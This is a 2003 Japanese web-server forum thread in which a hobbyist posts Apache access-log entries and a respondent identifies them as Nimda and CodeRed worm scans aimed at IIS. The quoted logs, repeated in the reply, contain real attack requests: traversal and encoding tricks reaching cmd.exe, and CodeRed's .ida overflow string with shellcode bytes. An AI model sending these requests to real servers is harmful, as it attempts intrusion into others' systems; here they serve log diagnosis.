投稿日:2003年08月29日 作成鷹の巣

No.11934 Apacheのアクセスログの不正アクセスの目的は?



Apacheのアクセスログの不正アクセスの目的は?

No.11934 投稿時間:2003年08月29日(Fri) 00:17 投稿者名:ike URL:

はじめまして、ikeと申します。
こちらで勉強させて頂いて、
フリーのDDNSを利用してWWWサーバーを公開出来ました。

OSはWindows98seで、サーバーはapache1.3xで、モデム直結、
ファイアウォールはZoneAlarm3.7.202を使用しています。
(低スペックマシンなので常時接続とはいきませんが)

Apacheのアクセスログに不正アクセスと思われるものを発見したんで
すが、
その人がなにをしようとしたのかが分かりませんので、
ご教授願えればと思い書き込ませていただきました。
以下に抜粋します。

61.38.94.38 - - [25/Aug/2003:18:41:35 +0900] "GET /scripts/root
.exe?/c+dir HTTP/1.0" 404 284
61.38.94.38 - - [25/Aug/2003:18:41:37 +0900] "GET /MSADC/root.e
xe?/c+dir HTTP/1.0" 404 282
61.38.94.38 - - [25/Aug/2003:18:41:38 +0900] "GET /c/winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 292
61.38.94.38 - - [25/Aug/2003:18:41:39 +0900] "GET /d/winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 292
61.38.94.38 - - [25/Aug/2003:18:41:41 +0900] "GET /scripts/..%2
55c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
61.38.94.38 - - [25/Aug/2003:18:41:42 +0900] "GET /_vti_bin/..%
255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.
0" 404 323
61.38.94.38 - - [25/Aug/2003:18:41:44 +0900] "GET /_mem_bin/..%
255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.
0" 404 323
61.38.94.38 - - [25/Aug/2003:18:41:45 +0900] "GET /msadc/..%255
c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 339
61.38.94.38 - - [25/Aug/2003:18:41:46 +0900] "GET /scripts/..%c
1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
61.38.94.38 - - [25/Aug/2003:18:41:48 +0900] "GET /scripts/..%c
0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
61.38.94.38 - - [25/Aug/2003:18:41:49 +0900] "GET /scripts/..%c
0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
61.38.94.38 - - [25/Aug/2003:18:41:51 +0900] "GET /scripts/..%c
1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
61.38.94.38 - - [25/Aug/2003:18:41:52 +0900] "GET /scripts/..%%
35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
61.38.94.38 - - [25/Aug/2003:18:41:53 +0900] "GET /scripts/..%%
35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
61.38.94.38 - - [25/Aug/2003:18:41:55 +0900] "GET /scripts/..%2
5%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
61.38.94.38 - - [25/Aug/2003:18:41:56 +0900] "GET /scripts/..%2
52f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
61.16.204.53 - - [26/Aug/2003:00:09:32 +0900] "GET /default.ida
?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 279
公開用のディレクトリはCドライブではありませんでしたので、全てエ
ラーになっています。


ワームです。

No.11935 投稿時間:2003年08月29日(Fri) 00:42 投稿者名:帯鯖 URL:

帯鯖@名古屋です。

付記のログは、Nimda と CodeRed です。IIS の脆弱性を狙ったワームで、人手によるアクセスではありません。
まずスキャンをして、結果にヒットすると伝染を試みるタイプです。

日常的に飛び回っているワームですので、対策を施していれば何の心配も要りません。

一時は1日に数十件数百件来ていたものの、気づいてみればめっきり少なくなりましたね。

> はじめまして、ikeと申します。
> こちらで勉強させて頂いて、
> フリーのDDNSを利用してWWWサーバーを公開出来ました。
>
> OSはWindows98seで、サーバーはapache1.3xで、モデム直結、
> ファイアウォールはZoneAlarm3.7.202を使用しています。
> (低スペックマシンなので常時接続とはいきませんが)
>
> Apacheのアクセスログに不正アクセスと思われるものを発見したんで
> すが、
> その人がなにをしようとしたのかが分かりませんので、
> ご教授願えればと思い書き込ませていただきました。
> 以下に抜粋します。
>
> 61.38.94.38 - - [25/Aug/2003:18:41:35 +0900] "GET /scripts/root
> .exe?/c+dir HTTP/1.0" 404 284
> 61.38.94.38 - - [25/Aug/2003:18:41:37 +0900] "GET /MSADC/root.e
> xe?/c+dir HTTP/1.0" 404 282
> 61.38.94.38 - - [25/Aug/2003:18:41:38 +0900] "GET /c/winnt/syst
> em32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 61.38.94.38 - - [25/Aug/2003:18:41:39 +0900] "GET /d/winnt/syst
> em32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 61.38.94.38 - - [25/Aug/2003:18:41:41 +0900] "GET /scripts/..%2
> 55c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 61.38.94.38 - - [25/Aug/2003:18:41:42 +0900] "GET /_vti_bin/..%
> 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.
> 0" 404 323
> 61.38.94.38 - - [25/Aug/2003:18:41:44 +0900] "GET /_mem_bin/..%
> 255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.
> 0" 404 323
> 61.38.94.38 - - [25/Aug/2003:18:41:45 +0900] "GET /msadc/..%255
> c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sys
> tem32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 61.38.94.38 - - [25/Aug/2003:18:41:46 +0900] "GET /scripts/..%c
> 1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 61.38.94.38 - - [25/Aug/2003:18:41:48 +0900] "GET /scripts/..%c
> 0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 61.38.94.38 - - [25/Aug/2003:18:41:49 +0900] "GET /scripts/..%c
> 0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 61.38.94.38 - - [25/Aug/2003:18:41:51 +0900] "GET /scripts/..%c
> 1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 61.38.94.38 - - [25/Aug/2003:18:41:52 +0900] "GET /scripts/..%%
> 35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 61.38.94.38 - - [25/Aug/2003:18:41:53 +0900] "GET /scripts/..%%
> 35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 61.38.94.38 - - [25/Aug/2003:18:41:55 +0900] "GET /scripts/..%2
> 5%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 61.38.94.38 - - [25/Aug/2003:18:41:56 +0900] "GET /scripts/..%2
> 52f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 61.16.204.53 - - [26/Aug/2003:00:09:32 +0900] "GET /default.ida
> ?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%
> u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
> 3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 279
> 公開用のディレクトリはCドライブではありませんでしたので、全てエ
> ラーになっています。


ご回答ありがとうございます

No.11936 投稿時間:2003年08月29日(Fri) 01:17 投稿者名:ike URL:

> 帯鯖@名古屋です。
>
> 付記のログは、Nimda と CodeRed です。IIS の脆弱性を狙ったワームで、人手によるアクセスではありません。
> まずスキャンをして、結果にヒットすると伝染を試みるタイプです。
>
> 日常的に飛び回っているワームですので、対策を施していれば何の心配も要りません。
>
> 一時は1日に数十件数百件来ていたものの、気づいてみればめっきり少なくなりましたね。
>
そうだったんですか、これが有名なNimdaとCodeRed。
Apacheなので関係ないかもしれませんし、
一応、Windows Updateは、かかさず行っていますが、
サーバーを公開するのは、常に、加害者になりうる危険を伴うことなんですね。
セキュリティについてもう少し勉強してみようと思います。
どうも、ありがとうございました。


|目次|掲示板|過去ログ目次|▲頁先頭|